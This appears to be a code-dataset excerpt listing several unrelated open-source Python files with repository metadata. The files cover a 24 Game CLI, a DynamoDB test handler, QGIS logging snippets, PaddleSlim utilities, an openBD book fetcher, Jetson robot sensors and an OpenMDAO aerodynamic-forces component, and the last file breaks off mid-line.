r.remove(i) if len(r) != len(sc): return False return True def arg_parse(): parser = argparse.ArgumentParser(description='Play the 24 Game') parser.add_argument('-c', type=int, default=4, dest='count', help='the number of integers to play with, default=4') parser.add_argument('-C', action='store_true', dest='showcard', help='show cards instead of integers under interactive mode') parser.add_argument('-d', action='store_true', dest='debug', help='enable debug output') parser.add_argument('-i', action='store_true', dest='interactive', help='interactive mode, all positional integers arguments omitted') parser.add_argument('-N', action='store_true', dest='face2ten', help='under interactive mode, set J Q K to 10, default=11,12,13') parser.add_argument('-t', type=int, default=24, dest='target', help='the game target, default=24') parser.add_argument('integers', nargs='*') r = parser.parse_args() if not r.interactive and len(r.integers) == 0: r.interactive = True return r def main(): args = arg_parse() try: if args.interactive: gc = GameConsole(args.target, args.count, args.face2ten, args.showcard) gc.main() sys.exit(0) except KeyboardInterrupt: sys.exit(1) except Exception as e: if args.debug: traceback.print_exc() else: print(str(e), file=sys.stderr) sys.exit(3) if __name__ == '__main__': main()
6,449
2,524
69
ce74a3c506ce96d7da83678be3ac5f3605bd112f
839
py
Python
dynamodb-serverless/functions/put/handler.py
koki-nakamura22/serverless-framework-practice
b6fb96cc97ecb7a1fa167c7cccb143510466d350
[ "MIT" ]
null
null
null
dynamodb-serverless/functions/put/handler.py
koki-nakamura22/serverless-framework-practice
b6fb96cc97ecb7a1fa167c7cccb143510466d350
[ "MIT" ]
null
null
null
dynamodb-serverless/functions/put/handler.py
koki-nakamura22/serverless-framework-practice
b6fb96cc97ecb7a1fa167c7cccb143510466d350
[ "MIT" ]
null
null
null
import json import os import boto3 from faker import Faker # DynamoDB object dynamodb = boto3.resource('dynamodb') table = dynamodb.Table(f"TestUsersTable-{os.environ['STAGE']}")
20.463415
95
0.588796
import json import os import boto3 from faker import Faker # DynamoDB object dynamodb = boto3.resource('dynamodb') table = dynamodb.Table(f"TestUsersTable-{os.environ['STAGE']}") def __truncate(): response = table.scan() key_names = [ x["AttributeName"] for x in table.key_schema ] delete_keys = [ { k:v for k,v in x.items() if k in key_names } for x in response["Items"] ] with table.batch_writer() as batch: for key in delete_keys: batch.delete_item(Key = key) def __put(id, name): table.put_item( Item = { "id" : id, "name" : name, } ) def put(event, context): __truncate() fake = Faker() for n in range(1, 10 + 1): __put(str(n).zfill(3), fake.name()) response = { "statusCode": 200, } return response
586
0
69
8411765f0f08514141bd4c621bce5644bb0156cd
398
py
Python
Chapter07/4985_07_01-logs.py
mapenthusiast/QGIS-Python-Programming-Cookbook-Second-Edition
1b2fefdb09f614a2005976a451f882a198c6c9c5
[ "MIT" ]
43
2017-03-27T18:58:26.000Z
2022-03-25T15:29:45.000Z
Chapter07/4985_07_01-logs.py
mapenthusiast/QGIS-Python-Programming-Cookbook-Second-Edition
1b2fefdb09f614a2005976a451f882a198c6c9c5
[ "MIT" ]
2
2018-07-02T09:23:47.000Z
2018-08-23T13:57:41.000Z
Chapter07/4985_07_01-logs.py
mapenthusiast/QGIS-Python-Programming-Cookbook-Second-Edition
1b2fefdb09f614a2005976a451f882a198c6c9c5
[ "MIT" ]
31
2017-03-08T06:37:22.000Z
2021-12-17T21:51:30.000Z
# Using Log Files # Settings/Options/System/Environment (use custom variables) # QGIS_LOG_FILE=/qgis_data/log.txt # Restart QGIS # Message to log file: QgsLogger.logMessageToFile("This is a message to a log file.") # Message to QGIS Log Window ( yellow triangle icon in the lower right) QgsMessageLog.logMessage("This is a message from the Python Console", "Python Console", QgsMessageLog.INFO)
36.181818
107
0.776382
# Using Log Files # Settings/Options/System/Environment (use custom variables) # QGIS_LOG_FILE=/qgis_data/log.txt # Restart QGIS # Message to log file: QgsLogger.logMessageToFile("This is a message to a log file.") # Message to QGIS Log Window ( yellow triangle icon in the lower right) QgsMessageLog.logMessage("This is a message from the Python Console", "Python Console", QgsMessageLog.INFO)
0
0
0
fad016a754f61df9c72c04956901d978db0b6df6
1,500
py
Python
paddleslim/nas/ofa/utils/utils.py
zhuguiqian/PaddleSlim
c363c91c36bb9ada41f755c0ec4df3282ccdd6f0
[ "Apache-2.0" ]
null
null
null
paddleslim/nas/ofa/utils/utils.py
zhuguiqian/PaddleSlim
c363c91c36bb9ada41f755c0ec4df3282ccdd6f0
[ "Apache-2.0" ]
null
null
null
paddleslim/nas/ofa/utils/utils.py
zhuguiqian/PaddleSlim
c363c91c36bb9ada41f755c0ec4df3282ccdd6f0
[ "Apache-2.0" ]
null
null
null
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License.
31.914894
74
0.692667
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. def compute_start_end(kernel_size, sub_kernel_size): center = kernel_size // 2 sub_center = sub_kernel_size // 2 start = center - sub_center end = center + sub_center + 1 assert end - start == sub_kernel_size return start, end def get_same_padding(kernel_size): assert isinstance(kernel_size, int) assert kernel_size % 2 > 0, "kernel size must be odd number" return kernel_size // 2 def convert_to_list(value, n): return [value, ] * n def search_idx(num, sorted_nestlist): max_num = -1 max_idx = -1 for idx in range(len(sorted_nestlist)): task_ = sorted_nestlist[idx] max_num = task_[-1] max_idx = len(task_) - 1 for phase_idx in range(len(task_)): if num <= task_[phase_idx]: return idx, phase_idx assert num > max_num return len(sorted_nestlist) - 1, max_idx
793
0
92
9e42668859a3e942dd8cf341d42cb36a048ac54f
3,715
py
Python
backend/openbd.py
n-yU/shisho
dc99a2d90dde3599af62a6a59a4aabf6b5a72011
[ "MIT" ]
1
2021-08-20T05:34:31.000Z
2021-08-20T05:34:31.000Z
backend/openbd.py
n-yU/shisho
dc99a2d90dde3599af62a6a59a4aabf6b5a72011
[ "MIT" ]
null
null
null
backend/openbd.py
n-yU/shisho
dc99a2d90dde3599af62a6a59a4aabf6b5a72011
[ "MIT" ]
null
null
null
from logging import getLogger, StreamHandler, DEBUG, Formatter from typing import Dict, Union import re import json import requests import MeCab from neologdn import normalize # ロガー設定 logger = getLogger(__name__) handler = StreamHandler() handler.setLevel(DEBUG) logger.setLevel(DEBUG) logger.addHandler(handler) logger.propagate = False handler.setFormatter(Formatter('[openBD] %(asctime)s - %(message)s'))
35.04717
155
0.602692
from logging import getLogger, StreamHandler, DEBUG, Formatter from typing import Dict, Union import re import json import requests import MeCab from neologdn import normalize # ロガー設定 logger = getLogger(__name__) handler = StreamHandler() handler.setLevel(DEBUG) logger.setLevel(DEBUG) logger.addHandler(handler) logger.propagate = False handler.setFormatter(Formatter('[openBD] %(asctime)s - %(message)s')) class OpenBD: # openBD: https://openbd.jp/ def __init__(self, isbn10: int, mecab: MeCab.Tagger): """"インスタンス生成時の初期化処理 Args: isbn10 (int): OpenBDへリクエストする書籍のISBN-10 mecab (MeCab.Tagger): MeCab設定(辞書等) """ self.isbn10 = isbn10 # 書籍のISBN-10 self.result = self.get_json_from_openbd() # openBDへのリクエスト結果 self.mecab = mecab # MeCab設定 def get_json_from_openbd(self) -> str: """openBDから書籍情報取得 Returns: str: openBDリクエスト結果 """ # 指定ISBN-10の書籍情報を取得する, openBDエンドポイント openbd_endpoint = 'https://api.openbd.jp/v1/get?isbn={0}'.format(self.isbn10) try: response = requests.get(openbd_endpoint) response.raise_for_status() except requests.RequestException as e: # ステータスコード200番台以外 -> エラーログ出力 logger.debug(e) return 'FAILED' openbd = json.loads(response.text)[0] # 書籍情報 from openBD # openBDで書籍情報が見つからないケース if openbd is None: return 'NOT FOUND' self.openbd = openbd return 'OK' def get_std_info(self) -> Union[Dict[str, str], bool]: if self.result != 'OK': logger.debug('openBDからの書籍情報取得に失敗しているため基本情報を取得できません') return False # 基本情報取得 title = self.openbd['summary']['title'] # タイトル publisher = self.openbd['summary']['publisher'] # 出版社 authors = self.openbd['summary']['author'] # 著者 cover = self.openbd['summary']['cover'] # 表紙画像URL # ISBN-10ベース情報 isbn10 = self.isbn10 amazon = 'https://www.amazon.co.jp/dp/{0}'.format(isbn10) # 出版日: 形式が異なるため一時変数に代入後処理 tmp_pubdate = self.openbd['summary']['pubdate'] if len(tmp_pubdate) == 8: # pubdate: yyyyMMdd pubdate = '{0}-{1}-{2}'.format(tmp_pubdate[:4], tmp_pubdate[4:6], tmp_pubdate[6:]) else: # pubdare: yyyy-MM pubdate = '{0}-01'.format(tmp_pubdate) # 書籍詳細(目次や概要など)の取得 if self.openbd['onix']['CollateralDetail'].get('TextContent'): # 複数ある場合は連結 detail = ' '.join([text_content['Text'].replace('\n', ' ') for text_content in self.openbd['onix']['CollateralDetail']['TextContent']]) else: # 詳細が存在しない場合 -> 未登録とする detail = '未登録' # 書籍説明(タイトル,出版社,著者,詳細を連結した文章)テキスト(処理前) # neologdnによる正規化 -> 数字削除(目次対策) tmp_description = re.sub(r'[0-9]+', ' ', normalize('{0} {1} {2} {3}'.format(title, publisher, authors, detail))) # 書籍説明テキストの分かち書きと品詞フィルタリング description_word_list = [] # 書籍説明テキスト対象単語 for line in self.mecab.parse(tmp_description).splitlines(): chunks = line.split('\t') if len(chunks) > 3 and (chunks[3].startswith('動詞') or chunks[3].startswith('形容詞') or chunks[3].startswith('名詞')): # 動詞or形容詞or名詞 -> 訓練対象 description_word_list.append(chunks[0]) # 書籍説明テキスト(処理後): Doc2Vec訓練時に書籍を表す文章として使用 description = ' '.join(description_word_list) info = dict(amazon=amazon, isbn10=isbn10, cover=cover, title=title, publisher=publisher, authors=authors, pubdate=pubdate, description=description) return info
2,650
1,378
23
f7fe38c9a4b8c5796670a8aa33b5cb1b8bbd7c39
5,246
py
Python
src/jetson/Sensors/sensors_simple.py
ichalkiad/VW_challenge
333222010ecf3d1ca4a0e181239f761c975453e9
[ "Apache-2.0" ]
1
2017-08-16T08:42:49.000Z
2017-08-16T08:42:49.000Z
src/jetson/Sensors/sensors_simple.py
ichalkiad/VW_challenge
333222010ecf3d1ca4a0e181239f761c975453e9
[ "Apache-2.0" ]
4
2017-08-09T23:01:30.000Z
2017-08-24T16:44:13.000Z
src/jetson/Sensors/sensors_simple.py
yhalk/vw_challenge_ECR
c1ff50070d0f7367ccfbf473c69e90fd2be5e85e
[ "Apache-2.0" ]
null
null
null
import paho.mqtt.client as mqtt import ev3dev.ev3 as ev3 import ctypes import numpy as np import sys import cv2 from Sensors.mpu6050.mpu6050 import MPU6050 import smbus from Sensors.odometry import Odometry import sys, serial from serial.tools import list_ports #Create camera sensor object camera = OnBoardCamera()
43
280
0.609989
import paho.mqtt.client as mqtt import ev3dev.ev3 as ev3 import ctypes import numpy as np import sys import cv2 from Sensors.mpu6050.mpu6050 import MPU6050 import smbus from Sensors.odometry import Odometry import sys, serial from serial.tools import list_ports class Sensor(object): def __init__(self, *args, **kwargs): pass def read(self): raise ValueError('This function must be implemented by ') class IR_teensy(Sensor): def __init__(self): self.ports = list(list_ports.comports()) # get all the connected serial devices self.serial_port = serial.Serial('/dev/'+self.ports[0].name) # connect to the first def debug(self): ''' Use if cannot connect to the port This function will print all found serial devices and prints the name and index of the port ''' for i, item in enumerate(self.ports): print(i + ' : ' + item.name) def read(self): ''' Reads the current value from the teensy Returns: Distance in cm ''' measurement = self.serial_port.readline() # read the measurement measurement = measurement.decode('utf-8').split('\r') # change it to utf and split it on funny characters return measurement[0] # only return the actual measurment class IMU2(Sensor): def __init__(self, bus='/dev/i2c-1', address=0x68): self.bus = smbus.SMBus(1) self.address = address self.mpu = MPU6050(self.bus,self.address, 'IMU') def read(self): ''' Reads the current values from the IMU using the mpu library Returns: tuple containing: pitch, roll, gyro x,y,z, accel x,y,z these values are scaled and NOT raw ''' return self.mpu.read_all() class IMU(Sensor): def __init__(self, path_to_shared_lib_mpu='/home/nvidia/jetson-robot/IOInterface/jetson/Sensors/mpu/libmpu.so', bus_filename='/dev/i2c-1', bus_adresses=[0x68, 0x69]): bus_filename = bus_filename.encode('ascii') self.libmpu = ctypes.cdll.LoadLibrary(path_to_shared_lib_mpu) self.file_descriptors = [self.libmpu.initIMU(bus_filename, bus_adress) for bus_adress in bus_adresses] self.data_c_arrays = [(ctypes.c_int16*7)() for _ in range(len(bus_adresses))] self.name = 'imu' self.data_sources = ["temperature", "acceleration", "gyro"] def read(self): data_dict = {} for idx, (file_descriptor, data_c_array) in enumerate(zip(self.file_descriptors, self.data_c_arrays)): self.libmpu.readIMU(file_descriptor, data_c_array) data_np_array = np.array(data_c_array) data_dict['temperature_{}'.format(idx)] = data_np_array[0] / 340.0 + 36.53 data_dict['acceleration_{}'.format(idx)] = np.array([int(data_np_array[1]), int(data_np_array[2]), int(data_np_array[3]), ]) data_dict['gyro_{}'.format(idx)] = np.array([int(data_np_array[4]), int(data_np_array[5]), int(data_np_array[6]), ]) return data_dict def read_sensor_nr(self, sensor_nr): # TODO: Ask Max, if the magic values for temperature conversion are correct. data_dict = {} self.libmpu.readIMU(self.file_descriptors[sensor_nr], self.data_c_arrays[sensor_nr]) data_np_array = np.array(self.data_c_arrays[sensor_nr]) data_dict['temperature'] = data_np_array[0] / 340.0 + 36.53 data_dict['acceleration'] = np.array([int(data_np_array[1]), int(data_np_array[2]), int(data_np_array[3])]) data_dict['gyro'] = np.array([int(data_np_array[4]), int(data_np_array[5]), int(data_np_array[6])]) return data_dict def get_data_sources(self): return self.data_sources class OnBoardCamera(Sensor): def __init__(self): self.name = 'onBoardCamera' self.cap = cv2.VideoCapture("nvcamerasrc ! video/x-raw(memory:NVMM), width=(int)160, height=(int)120, format=(string)I420, framerate=(fraction)30/1 ! nvvidconv flip-method=2 ! video/x-raw, format=(string)I420 ! videoconvert ! video/x-raw, format=(string)BGR ! appsink") #self.cap = cv2.VideoCapture("nvcamerasrc ! video/x-raw(memory:NVMM), width=(int)(160), height=(int)(120),format=(string)I420, framerate=(fraction)2/1 ! nvvidconv flip-method=0 ! video/x-raw, format=(string)BGRx ! videoconvert ! video/x-raw, format=(string)BGR ! appsink") def read(self): if self.cap.isOpened(): ret_val, frame = self.cap.read(); frame = cv2.flip(frame,0) frame = cv2.flip(frame,1) else: raise ValueError('Camera not opened. Sorry this message is not really helpful, blame openCV :-) ') return {'onBoardCamera':frame} def clean_buf(self): for i in range(5): self.cap.grab() #Create camera sensor object camera = OnBoardCamera()
3,558
1,012
355
790f64346cac505157953135acdaf67a66ffe6fe
23,905
py
Python
mphys/integrated_forces.py
timryanb/mphys
74560a163034a0006a17811ba1206bab00f1f775
[ "Apache-2.0" ]
8
2022-02-22T18:08:56.000Z
2022-03-14T13:32:46.000Z
mphys/integrated_forces.py
timryanb/mphys
74560a163034a0006a17811ba1206bab00f1f775
[ "Apache-2.0" ]
15
2022-02-22T15:10:15.000Z
2022-03-23T16:15:09.000Z
mphys/integrated_forces.py
timryanb/mphys
74560a163034a0006a17811ba1206bab00f1f775
[ "Apache-2.0" ]
8
2022-02-22T18:08:35.000Z
2022-03-17T16:21:08.000Z
import numpy as np import openmdao.api as om if __name__ == '__main__': check_integrated_surface_force_partials()
53.004435
110
0.474001
import numpy as np import openmdao.api as om class IntegratedSurfaceForces(om.ExplicitComponent): def setup(self): self.add_input('aoa',desc = 'angle of attack', units='rad',tags=['mphys_input']) self.add_input('yaw',desc = 'yaw angle',units='rad',tags=['mphys_input']) self.add_input('ref_area', val = 1.0,tags=['mphys_input']) self.add_input('moment_center',shape=3,tags=['mphys_input']) self.add_input('ref_length', val = 1.0,tags=['mphys_input']) self.add_input('q_inf', val = 1.0,tags=['mphys_input']) self.add_input('x_aero', shape_by_conn=True, distributed=True, desc = 'surface coordinates', tags=['mphys_coupling']) self.add_input('f_aero', shape_by_conn=True, distributed=True, desc = 'dimensional forces at nodes', tags=['mphys_coupling']) self.add_output('C_L', desc = 'Lift coefficient', tags=['mphys_result']) self.add_output('C_D', desc = 'Drag coefficient', tags=['mphys_result']) self.add_output('C_X', desc = 'X Force coefficient', tags=['mphys_result']) self.add_output('C_Y', desc = 'Y Force coefficient', tags=['mphys_result']) self.add_output('C_Z', desc = 'Z Force coefficient', tags=['mphys_result']) self.add_output('CM_X', desc = 'X Moment coefficient', tags=['mphys_result']) self.add_output('CM_Y', desc = 'Y Moment coefficient', tags=['mphys_result']) self.add_output('CM_Z', desc = 'Z Moment coefficient', tags=['mphys_result']) self.add_output('Lift', desc = 'Total Lift', tags=['mphys_result']) self.add_output('Drag', desc = 'Total Drag', tags=['mphys_result']) self.add_output('F_X', desc = 'Total X Force', tags=['mphys_result']) self.add_output('F_Y', desc = 'Total Y Force', tags=['mphys_result']) self.add_output('F_Z', desc = 'Total Z Force', tags=['mphys_result']) self.add_output('M_X', desc = 'Total X Moment', tags=['mphys_result']) self.add_output('M_Y', desc = 'Total Y Moment', tags=['mphys_result']) self.add_output('M_Z', desc = 'Total Z Moment', tags=['mphys_result']) def compute(self,inputs,outputs): aoa = inputs['aoa'] yaw = inputs['yaw'] area = inputs['ref_area'] q_inf = inputs['q_inf'] xc = inputs['moment_center'][0] yc = inputs['moment_center'][1] zc = inputs['moment_center'][2] c = inputs['ref_length'] x = inputs['x_aero'][0::3] y = inputs['x_aero'][1::3] z = inputs['x_aero'][2::3] fx = inputs['f_aero'][0::3] fy = inputs['f_aero'][1::3] fz = inputs['f_aero'][2::3] fx_total = self.comm.allreduce(np.sum(fx)) fy_total = self.comm.allreduce(np.sum(fy)) fz_total = self.comm.allreduce(np.sum(fz)) outputs['F_X'] = fx_total outputs['F_Y'] = fy_total outputs['F_Z'] = fz_total outputs['C_X'] = fx_total / (q_inf * area) outputs['C_Y'] = fy_total / (q_inf * area) outputs['C_Z'] = fz_total / (q_inf * area) outputs['Lift'] = -fx_total * np.sin(aoa) + fz_total * np.cos(aoa) outputs['Drag'] = ( fx_total * np.cos(aoa) * np.cos(yaw) - fy_total * np.sin(yaw) + fz_total * np.sin(aoa) * np.cos(yaw) ) outputs['C_L'] = outputs['Lift'] / (q_inf * area) outputs['C_D'] = outputs['Drag'] / (q_inf * area) m_x = self.comm.allreduce( np.dot(fz,(y-yc)) - np.dot(fy,(z-zc))) m_y = self.comm.allreduce(-np.dot(fz,(x-xc)) + np.dot(fx,(z-zc))) m_z = self.comm.allreduce( np.dot(fy,(x-xc)) - np.dot(fx,(y-yc))) outputs['M_X'] = m_x outputs['M_Y'] = m_y outputs['M_Z'] = m_z outputs['CM_X'] = m_x / (q_inf * area * c) outputs['CM_Y'] = m_y / (q_inf * area * c) outputs['CM_Z'] = m_z / (q_inf * area * c) def compute_jacvec_product(self, inputs, d_inputs, d_outputs, mode): aoa = inputs['aoa'] yaw = inputs['yaw'] area = inputs['ref_area'] q_inf = inputs['q_inf'] xc = inputs['moment_center'][0] yc = inputs['moment_center'][1] zc = inputs['moment_center'][2] c = inputs['ref_length'] x = inputs['x_aero'][0::3] y = inputs['x_aero'][1::3] z = inputs['x_aero'][2::3] fx = inputs['f_aero'][0::3] fy = inputs['f_aero'][1::3] fz = inputs['f_aero'][2::3] fx_total = self.comm.allreduce(np.sum(fx)) fy_total = self.comm.allreduce(np.sum(fy)) fz_total = self.comm.allreduce(np.sum(fz)) lift = -fx_total * np.sin(aoa) + fz_total * np.cos(aoa) drag = ( fx_total * np.cos(aoa) * np.cos(yaw) - fy_total * np.sin(yaw) + fz_total * np.sin(aoa) * np.cos(yaw) ) m_x = self.comm.allreduce( np.dot(fz,(y-yc)) - np.dot(fy,(z-zc))) m_y = self.comm.allreduce(-np.dot(fz,(x-xc)) + np.dot(fx,(z-zc))) m_z = self.comm.allreduce( np.dot(fy,(x-xc)) - np.dot(fx,(y-yc))) if mode == 'fwd': if 'aoa' in d_inputs: daoa_rad = d_inputs['aoa'] if 'Lift' in d_outputs or 'C_L' in d_outputs: d_lift_d_aoa = ( - fx_total * np.cos(aoa) * daoa_rad - fz_total * np.sin(aoa) * daoa_rad ) if 'Lift' in d_outputs: d_outputs['Lift'] += d_lift_d_aoa if 'C_L' in d_outputs: d_outputs['C_L'] += d_lift_d_aoa / (q_inf * area) if 'Drag' in d_outputs or 'C_D' in d_outputs: d_drag_d_aoa = ( fx_total * (-np.sin(aoa) * daoa_rad) * np.cos(yaw) + fz_total * ( np.cos(aoa) * daoa_rad) * np.cos(yaw)) if 'Drag' in d_outputs: d_outputs['Drag'] += d_drag_d_aoa if 'C_D' in d_outputs: d_outputs['C_D'] += d_drag_d_aoa / (q_inf * area) if 'yaw' in d_inputs: dyaw_rad = d_inputs['yaw'] if 'Drag' in d_outputs or 'C_D' in d_outputs: d_drag_d_yaw = ( fx_total * np.cos(aoa) * (-np.sin(yaw) * dyaw_rad) - fy_total * np.cos(yaw) * dyaw_rad + fz_total * np.sin(aoa) * (-np.sin(yaw) * dyaw_rad) ) if 'Drag' in d_outputs: d_outputs['Drag'] += d_drag_d_yaw if 'C_D' in d_outputs: d_outputs['C_D'] += d_drag_d_yaw / (q_inf * area) if 'ref_area' in d_inputs: d_nondim = - d_inputs['ref_area'] / (q_inf * area**2.0) if 'C_X' in d_outputs: d_outputs['C_X'] += fx_total * d_nondim if 'C_Y' in d_outputs: d_outputs['C_Y'] += fy_total * d_nondim if 'C_Z' in d_outputs: d_outputs['C_Z'] += fz_total * d_nondim if 'C_L' in d_outputs: d_outputs['C_L'] += lift * d_nondim if 'C_D' in d_outputs: d_outputs['C_D'] += drag * d_nondim if 'CM_X' in d_outputs: d_outputs['CM_X'] += m_x * d_nondim / c if 'CM_X' in d_outputs: d_outputs['CM_Y'] += m_y * d_nondim / c if 'CM_Z' in d_outputs: d_outputs['CM_Z'] += m_z * d_nondim / c if 'moment_center' in d_inputs: dxc = d_inputs['moment_center'][0] dyc = d_inputs['moment_center'][1] dzc = d_inputs['moment_center'][2] if 'M_X' in d_outputs: d_outputs['M_X'] += -fz_total * dyc + fy_total * dzc if 'M_Y' in d_outputs: d_outputs['M_Y'] += fz_total * dxc - fx_total * dzc if 'M_Z' in d_outputs: d_outputs['M_Z'] += -fy_total * dxc + fx_total * dyc if 'CM_X' in d_outputs: d_outputs['CM_X'] += (-fz_total * dyc + fy_total * dzc) / (q_inf * area * c) if 'CM_Y' in d_outputs: d_outputs['CM_Y'] += ( fz_total * dxc - fx_total * dzc) / (q_inf * area * c) if 'CM_Z' in d_outputs: d_outputs['CM_Z'] += (-fy_total * dxc + fx_total * dyc) / (q_inf * area * c) if 'ref_length' in d_inputs: d_nondim = - d_inputs['ref_length'] / (q_inf * area * c**2.0) if 'CM_X' in d_outputs: d_outputs['CM_X'] += m_x * d_nondim if 'CM_X' in d_outputs: d_outputs['CM_Y'] += m_y * d_nondim if 'CM_Z' in d_outputs: d_outputs['CM_Z'] += m_z * d_nondim if 'q_inf' in d_inputs: d_nondim = - d_inputs['q_inf'] / (q_inf**2.0 * area) if 'C_X' in d_outputs: d_outputs['C_X'] += fx_total * d_nondim if 'C_Y' in d_outputs: d_outputs['C_Y'] += fy_total * d_nondim if 'C_Z' in d_outputs: d_outputs['C_Z'] += fz_total * d_nondim if 'C_L' in d_outputs: d_outputs['C_L'] += lift * d_nondim if 'C_D' in d_outputs: d_outputs['C_D'] += drag * d_nondim if 'CM_X' in d_outputs: d_outputs['CM_X'] += m_x * d_nondim / c if 'CM_X' in d_outputs: d_outputs['CM_Y'] += m_y * d_nondim / c if 'CM_Z' in d_outputs: d_outputs['CM_Z'] += m_z * d_nondim / c if 'x_aero' in d_inputs: dx = d_inputs['x_aero'][0::3] dy = d_inputs['x_aero'][1::3] dz = d_inputs['x_aero'][2::3] if 'M_X' in d_outputs: d_outputs['M_X'] += np.dot(fz,dy) - np.dot(fy,dz) if 'M_Y' in d_outputs: d_outputs['M_Y'] += -np.dot(fz,dx) + np.dot(fx,dz) if 'M_Z' in d_outputs: d_outputs['M_Z'] += np.dot(fy,dx) - np.dot(fx,dy) if 'CM_X' in d_outputs: d_outputs['CM_X'] += ( np.dot(fz,dy) - np.dot(fy,dz)) / (q_inf * area * c) if 'CM_Y' in d_outputs: d_outputs['CM_Y'] += (-np.dot(fz,dx) + np.dot(fx,dz)) / (q_inf * area * c) if 'CM_Z' in d_outputs: d_outputs['CM_Z'] += ( np.dot(fy,dx) - np.dot(fx,dy)) / (q_inf * area * c) if 'f_aero' in d_inputs: dfx = d_inputs['f_aero'][0::3] dfy = d_inputs['f_aero'][1::3] dfz = d_inputs['f_aero'][2::3] dfx_total = np.sum(dfx) dfy_total = np.sum(dfy) dfz_total = np.sum(dfz) if 'F_X' in d_outputs: d_outputs['F_X'] += dfx_total if 'F_Y' in d_outputs: d_outputs['F_Y'] += dfy_total if 'F_Z' in d_outputs: d_outputs['F_Z'] += dfz_total if 'C_X' in d_outputs: d_outputs['C_X'] += dfx_total / (q_inf * area) if 'C_Y' in d_outputs: d_outputs['C_Y'] += dfy_total / (q_inf * area) if 'C_Z' in d_outputs: d_outputs['C_Z'] += dfz_total / (q_inf * area) if 'Lift' in d_outputs: d_outputs['Lift'] += -dfx_total * np.sin(aoa) + dfz_total * np.cos(aoa) if 'Drag' in d_outputs: d_outputs['Drag'] += ( dfx_total * np.cos(aoa) * np.cos(yaw) - dfy_total * np.sin(yaw) + dfz_total * np.sin(aoa) * np.cos(yaw) ) if 'C_L' in d_outputs: d_outputs['C_L'] += (-dfx_total * np.sin(aoa) + dfz_total * np.cos(aoa)) / (q_inf * area) if 'C_D' in d_outputs: d_outputs['C_D'] += ( dfx_total * np.cos(aoa) * np.cos(yaw) - dfy_total * np.sin(yaw) + dfz_total * np.sin(aoa) * np.cos(yaw) ) / (q_inf * area) if 'M_X' in d_outputs: d_outputs['M_X'] += np.dot(dfz,(y-yc)) - np.dot(dfy,(z-zc)) if 'M_Y' in d_outputs: d_outputs['M_Y'] += -np.dot(dfz,(x-xc)) + np.dot(dfx,(z-zc)) if 'M_Z' in d_outputs: d_outputs['M_Z'] += np.dot(dfy,(x-xc)) - np.dot(dfx,(y-yc)) if 'CM_X' in d_outputs: d_outputs['CM_X'] += ( np.dot(dfz,(y-yc)) - np.dot(dfy,(z-zc))) / (q_inf * area * c) if 'CM_Y' in d_outputs: d_outputs['CM_Y'] += (-np.dot(dfz,(x-xc)) + np.dot(dfx,(z-zc))) / (q_inf * area * c) if 'CM_Z' in d_outputs: d_outputs['CM_Z'] += ( np.dot(dfy,(x-xc)) - np.dot(dfx,(y-yc))) / (q_inf * area * c) elif mode == 'rev': if 'aoa' in d_inputs: if 'Lift' in d_outputs or 'C_L' in d_outputs: d_lift = d_outputs['Lift'] if 'Lift' in d_outputs else 0.0 d_cl = d_outputs['C_L'] if 'C_L' in d_outputs else 0.0 d_inputs['aoa'] += ( - fx_total * np.cos(aoa) - fz_total * np.sin(aoa) ) * (d_lift + d_cl / (q_inf * area)) if 'Drag' in d_outputs or 'C_D' in d_outputs: d_drag = d_outputs['Drag'] if 'Drag' in d_outputs else 0.0 d_cd = d_outputs['C_D'] if 'C_D' in d_outputs else 0.0 d_inputs['aoa'] += ( fx_total * (-np.sin(aoa)) * np.cos(yaw) + fz_total * ( np.cos(aoa)) * np.cos(yaw) ) * (d_drag + d_cd / (q_inf * area)) if 'yaw' in d_inputs: if 'Drag' in d_outputs or 'C_D' in d_outputs: d_drag = d_outputs['Drag'] if 'Drag' in d_outputs else 0.0 d_cd = d_outputs['C_D'] if 'C_D' in d_outputs else 0.0 d_inputs['yaw'] += ( fx_total * np.cos(aoa) * (-np.sin(yaw)) - fy_total * np.cos(yaw) + fz_total * np.sin(aoa) * (-np.sin(yaw)) ) * (d_drag + d_cd / (q_inf * area)) if 'ref_area' in d_inputs: d_nondim = - 1.0 / (q_inf * area**2.0) if 'C_X' in d_outputs: d_inputs['ref_area'] += d_outputs['C_X'] * fx_total * d_nondim if 'C_Y' in d_outputs: d_inputs['ref_area'] += d_outputs['C_Y'] * fy_total * d_nondim if 'C_Z' in d_outputs: d_inputs['ref_area'] += d_outputs['C_Z'] * fz_total * d_nondim if 'C_L' in d_outputs: d_inputs['ref_area'] += d_outputs['C_L'] * lift * d_nondim if 'C_D' in d_outputs: d_inputs['ref_area'] += d_outputs['C_D'] * drag * d_nondim if 'CM_X' in d_outputs: d_inputs['ref_area'] += d_outputs['CM_X'] * m_x * d_nondim / c if 'CM_X' in d_outputs: d_inputs['ref_area'] += d_outputs['CM_Y'] * m_y * d_nondim / c if 'CM_Z' in d_outputs: d_inputs['ref_area'] += d_outputs['CM_Z'] * m_z * d_nondim / c if 'moment_center' in d_inputs: if 'M_X' in d_outputs: d_inputs['moment_center'][1] += -fz_total * d_outputs['M_X'] d_inputs['moment_center'][2] += fy_total * d_outputs['M_X'] if 'M_Y' in d_outputs: d_inputs['moment_center'][0] += fz_total * d_outputs['M_Y'] d_inputs['moment_center'][2] += -fx_total * d_outputs['M_Y'] if 'M_Z' in d_outputs: d_inputs['moment_center'][0] += -fy_total * d_outputs['M_Z'] d_inputs['moment_center'][1] += fx_total * d_outputs['M_Z'] if 'CM_X' in d_outputs: d_inputs['moment_center'][1] += -fz_total * d_outputs['CM_X'] / (q_inf * area * c) d_inputs['moment_center'][2] += fy_total * d_outputs['CM_X'] / (q_inf * area * c) if 'CM_Y' in d_outputs: d_inputs['moment_center'][0] += fz_total * d_outputs['CM_Y'] / (q_inf * area * c) d_inputs['moment_center'][2] += 